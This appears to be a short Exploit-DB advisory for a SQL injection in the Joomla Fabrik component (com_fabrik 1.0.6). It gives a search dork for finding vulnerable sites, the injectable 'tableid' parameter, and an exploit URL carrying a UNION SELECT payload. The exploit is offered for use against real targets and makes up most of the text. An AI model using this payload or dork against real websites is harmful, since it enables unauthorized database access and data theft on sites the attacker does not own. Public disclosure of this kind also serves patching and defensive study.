[] NeoSense

Joomla! Component Fabrik - SQL Injection

Author: Mkr0x
type: webapps
platform: php
port: 
date_added: 2010-08-21 
date_updated: 2017-01-09 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comcom_fabrik_1.0.6.zip

$##################################################################$
# +==============================================================+
# | Joomla Component (com_Fabrik) SQL Injection Vulnerability  |
# +==============================================================+
# Vendor : http://fabrikar.com/
# Author : Mkr0x
# Home : www.kernel.ge
# E-mail : mkrcard@gmail.com
# Place : Georgia
$##################################################################$
# Dork :
 index.php?option=com_fabrik
--
# Vulnerable :
 http://[target]/index.php?option=com_fabrik&view=table&tableid=[SQL]
--
# Exploit :
 http://[target]/index.php?option=com_fabrik&view=table&tableid=13+union+select+1--
--

 Best Regards
  -Mkr0x-

# „Georgia has always been at the foreground“ ..
$##################################################################$